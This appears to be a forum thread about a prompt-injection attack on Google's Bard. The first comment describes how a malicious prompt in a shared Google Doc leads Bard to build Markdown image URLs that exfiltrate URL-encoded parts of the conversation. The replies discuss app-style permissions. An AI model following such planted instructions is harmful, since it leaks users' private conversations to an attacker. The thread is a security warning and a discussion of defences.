[colemannugent]

TLDR: Bard will render Markdown images in conversations. Bard can also read the contents of your Google docs to give responses more context. By sharing a Google Doc containing a malicious prompt with a victim you could get Bard to generate Markdown image links with URL parameters containing URL encoded sections of your conversation. These sections of the conversation can then be exfiltrated when the Bard UI attempts to load the images by reaching out to the URL the attacker had Bard previously create.

Moral of the story: be careful what your AI assistant reads, it could be controlled by an attacker and contain hypnotic suggestions.

[gtirloni]

Looks like we need a system of permissions like Android and iOS have for apps.

[dietr1ch]

Hopefully it'll be tightly scoped and not like, hey I need access to read/create/modify/delete all your calendar events and contacts just so I can check if you are busy

[ericjmorey]

This is a good illustration of the current state of permissions for mobile apps.